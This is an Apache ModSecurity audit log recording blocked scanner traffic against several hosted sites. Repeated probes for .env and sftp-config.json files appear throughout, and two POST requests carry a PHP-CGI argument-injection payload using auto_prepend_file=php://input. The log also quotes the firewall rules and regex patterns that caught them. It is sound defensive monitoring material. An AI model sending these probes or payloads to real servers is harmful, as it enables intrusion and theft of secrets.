%s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853081968370 772 (- - -) Stopwatch2: 1744853081968370 772; combined=315, p1=270, p2=0, p3=0, p4=0, p5=45, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9078df13-Z-- --dca35a62-A-- [17/Apr/2025:08:24:43 +0700] aABYWydHtgGT4CGaO0h-0AAAAEI 103.236.140.4 56916 103.236.140.4 8181 --dca35a62-B-- GET /.env.prod HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --dca35a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dca35a62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853083648189 883 (- - -) Stopwatch2: 1744853083648189 883; combined=328, p1=275, p2=0, p3=0, p4=0, p5=53, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dca35a62-Z-- --02d49612-A-- [17/Apr/2025:08:24:57 +0700] aABYaSdHtgGT4CGaO0h-1gAAAEw 103.236.140.4 56934 103.236.140.4 8181 --02d49612-B-- GET /dev/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --02d49612-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02d49612-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853097453326 759 (- - -) Stopwatch2: 1744853097453326 759; combined=311, p1=278, p2=0, p3=0, p4=0, p5=33, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02d49612-Z-- --922d7a65-A-- [17/Apr/2025:08:24:58 +0700] aABYaidHtgGT4CGaO0h-1wAAAEg 103.236.140.4 56936 103.236.140.4 8181 --922d7a65-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --922d7a65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --922d7a65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853098646760 650 (- - -) Stopwatch2: 1744853098646760 650; combined=248, p1=222, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --922d7a65-Z-- --243c526c-A-- [17/Apr/2025:11:06:16 +0700] aAB-OJttSyr0uJld9k4q1gAAANg 103.236.140.4 41042 103.236.140.4 8181 --243c526c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.2.594 (beta) Yowser/2.5 Safari/537.36 Accept-Charset: utf-8 --243c526c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --243c526c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744862776539810 781 (- - -) Stopwatch2: 1744862776539810 781; combined=374, p1=334, p2=0, p3=0, p4=0, p5=39, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --243c526c-Z-- --5780450d-A-- [17/Apr/2025:13:04:46 +0700] aACZ_t9Bm7jS0aoVS7Lo6gAAAIk 103.236.140.4 34994 103.236.140.4 8181 --5780450d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.141.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.141.38 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.25.1 Accept: */* Content-Type: application/x-www-form-urlencoded --5780450d-C-- --5780450d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5780450d-E-- --5780450d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744869886496014 4305 (- - -) Stopwatch2: 1744869886496014 4305; combined=2840, p1=497, p2=2313, p3=0, p4=0, p5=30, sr=105, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5780450d-Z-- --64975614-A-- [17/Apr/2025:17:07:37 +0700] aADS6ZttSyr0uJld9k6oUAAAANc 103.236.140.4 48808 103.236.140.4 8181 --64975614-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --64975614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64975614-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744884457211639 829 (- - -) Stopwatch2: 1744884457211639 829; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64975614-Z-- --816a585d-A-- [17/Apr/2025:17:07:40 +0700] aADS7CdHtgGT4CGaO0jxOgAAAEk 103.236.140.4 48824 103.236.140.4 8181 --816a585d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --816a585d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --816a585d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744884460125428 700 (- - -) Stopwatch2: 1744884460125428 700; combined=266, p1=228, p2=0, p3=0, p4=0, p5=37, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --816a585d-Z-- --b6fe030e-A-- [17/Apr/2025:17:44:37 +0700] aADblSdHtgGT4CGaO0j0uwAAAEM 103.236.140.4 34624 103.236.140.4 8181 --b6fe030e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 124.115.231.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 124.115.231.142 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b6fe030e-C-- --b6fe030e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6fe030e-E-- --b6fe030e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744886677134838 4989 (- - -) Stopwatch2: 1744886677134838 4989; combined=3678, p1=534, p2=3109, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6fe030e-Z-- --908cca21-A-- [17/Apr/2025:18:10:04 +0700] aADhjCdHtgGT4CGaO0j2NwAAAEk 103.236.140.4 40214 103.236.140.4 8181 --908cca21-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.108.196 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.108.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --908cca21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --908cca21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744888204649937 799 (- - -) Stopwatch2: 1744888204649937 799; combined=356, p1=321, p2=0, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --908cca21-Z-- --03a1930f-A-- [17/Apr/2025:18:58:37 +0700] aADs7d9Bm7jS0aoVS7I2xAAAAIk 103.236.140.4 38886 103.236.140.4 8181 --03a1930f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --03a1930f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03a1930f-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744891117628937 788 (- - -) Stopwatch2: 1744891117628937 788; combined=303, p1=267, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03a1930f-Z-- --29c79f0c-A-- [17/Apr/2025:18:58:42 +0700] aADs8j2cuLCXMl1vWbCRdwAAAAo 103.236.140.4 38906 103.236.140.4 8181 --29c79f0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --29c79f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29c79f0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744891122416030 906 (- - -) Stopwatch2: 1744891122416030 906; combined=423, p1=380, p2=0, p3=0, p4=0, p5=43, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29c79f0c-Z-- --1a2cef19-A-- [17/Apr/2025:19:19:42 +0700] aADx3j2cuLCXMl1vWbCSyQAAABg 103.236.140.4 43456 103.236.140.4 8181 --1a2cef19-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.222.147.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.222.147.167 X-Forwarded-Proto: https Connection: close Content-Length: 28 content-type: application/dns-message accept: application/dns-message user-agent: Chrome --1a2cef19-C-- 9googlecom --1a2cef19-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a2cef19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744892382505929 4215 (- - -) Stopwatch2: 1744892382505929 4215; combined=2651, p1=556, p2=1998, p3=31, p4=34, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a2cef19-Z-- --7a0c0d4d-A-- [17/Apr/2025:20:02:39 +0700] aAD77ydHtgGT4CGaO0gF-AAAAFA 103.236.140.4 54414 103.236.140.4 8181 --7a0c0d4d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.141.45.70 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.141.45.70 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --7a0c0d4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a0c0d4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744894959489953 714 (- - -) Stopwatch2: 1744894959489953 714; combined=274, p1=236, p2=0, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a0c0d4d-Z-- --2e3a5b4c-A-- [17/Apr/2025:20:46:41 +0700] aAEGQSdHtgGT4CGaO0gIWQAAAEs 103.236.140.4 35716 103.236.140.4 8181 --2e3a5b4c-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.21.85.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.21.85.27 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --2e3a5b4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e3a5b4c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744897601958816 882 (- - -) Stopwatch2: 1744897601958816 882; combined=335, p1=294, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e3a5b4c-Z-- --e292171c-A-- [18/Apr/2025:00:06:24 +0700] aAE1ED2cuLCXMl1vWbCoXgAAAAw 103.236.140.4 55530 103.236.140.4 8181 --e292171c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e292171c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e292171c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744909584001646 785 (- - -) Stopwatch2: 1744909584001646 785; combined=357, p1=316, p2=0, p3=0, p4=0, p5=41, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e292171c-Z-- --08bbd451-A-- [18/Apr/2025:00:06:27 +0700] aAE1E5ttSyr0uJld9k7KfgAAAMQ 103.236.140.4 55546 103.236.140.4 8181 --08bbd451-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --08bbd451-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08bbd451-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744909587455744 810 (- - -) Stopwatch2: 1744909587455744 810; combined=335, p1=280, p2=0, p3=0, p4=0, p5=55, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08bbd451-Z-- --f69b4716-A-- [18/Apr/2025:01:25:50 +0700] aAFHrt9Bm7jS0aoVS7JOwgAAAIg 103.236.140.4 50624 103.236.140.4 8181 --f69b4716-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1 Accept-Charset: utf-8 --f69b4716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f69b4716-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744914350646214 891 (- - -) Stopwatch2: 1744914350646214 891; combined=446, p1=403, p2=0, p3=0, p4=0, p5=42, sr=133, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f69b4716-Z-- --781d6235-A-- [18/Apr/2025:01:28:45 +0700] aAFIXZttSyr0uJld9k7RiAAAAMY 103.236.140.4 53238 103.236.140.4 8181 --781d6235-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --781d6235-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --781d6235-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744914525935663 877 (- - -) Stopwatch2: 1744914525935663 877; combined=413, p1=358, p2=0, p3=0, p4=0, p5=55, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --781d6235-Z-- --71dbe304-A-- [18/Apr/2025:01:51:38 +0700] aAFNut9Bm7jS0aoVS7JXewAAAIQ 103.236.140.4 45024 103.236.140.4 8181 --71dbe304-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 47.96.10.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.96.10.143 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --71dbe304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71dbe304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag 